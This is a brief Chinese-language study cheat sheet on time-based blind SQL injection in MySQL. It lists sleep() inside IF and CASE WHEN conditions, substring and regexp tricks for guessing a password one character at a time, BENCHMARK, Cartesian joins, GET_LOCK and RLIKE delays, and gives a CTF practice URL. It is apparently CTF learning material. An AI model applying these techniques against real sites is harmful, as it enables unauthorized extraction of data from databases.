基于时间的盲注
sleep
1.配合if条件触发
IF()
select if(1,2,3)
substr(str, position, len)
substring(str, position, len) == substring(str FROM position FOR len)
substring_index(被截取的字段, 关键字, 关键字出现的次数)
select * from user where password='123456';# 假如密码是123456
select * from user where passwod rlike '^1';
select * from user where passwod regexp '^1';
2. 配合select case when 条件触发
SELECT CASE WHEN username='admin' THEN 'xxx' ELSE(sleep(3)) end FROM user;
BENCHMARK
笛卡尔积
让计算变慢,其实就是让运算变多。
select count(*) from usera, userb;
假设usera为
id | vavlue |
---|---|
1 | 1 |
2 | 2 |
userb为
id | vavlue |
---|---|
1 | 1 |
2 | 2 |
则结果为2*2
GET_LOCK
只有在长连接下才会有效
RLIKE
构造长字符,然后去匹配。
tip: test website
http://ctf5.shiyanbar.com/web/baocuo/index.php